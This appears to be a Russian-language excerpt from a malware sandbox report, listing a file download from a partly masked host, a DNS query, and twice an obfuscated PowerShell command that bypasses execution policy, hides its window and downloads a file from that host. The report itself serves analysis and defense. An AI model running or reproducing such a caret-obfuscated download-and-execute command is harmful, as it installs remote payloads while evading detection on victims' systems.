Техническая информация
- http://ho###ster.top/avd.hls как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWe^rsHELl^.ex^e^ -exE^cu^Tio^npO^LiCy^ bY^pAs^S ^-n^Op^R^ofiLE ^-^wiNd^oWSTY^lE^ hiDd^en (^NE^W-O^bjECt S^Yste^M^.N^E^T.^wEBClIe^N^t).^D^O^w^nLOa^dFi^l^E^('http://ho###ste...
- DNS ASK ho###ster.top
- '<SYSTEM32>\cmd.exe' /c "P^oWe^rsHELl^.ex^e^ -exE^cu^Tio^npO^LiCy^ bY^pAs^S ^-n^Op^R^ofiLE ^-^wiNd^oWSTY^lE^ hiDd^en (^NE^W-O^bjECt S^Yste^M^.N^E^T.^wEBClIe^N^t).^D^O^w^nLOa^dFi^l^E^('http://ho###ste...' (со скрытым окном)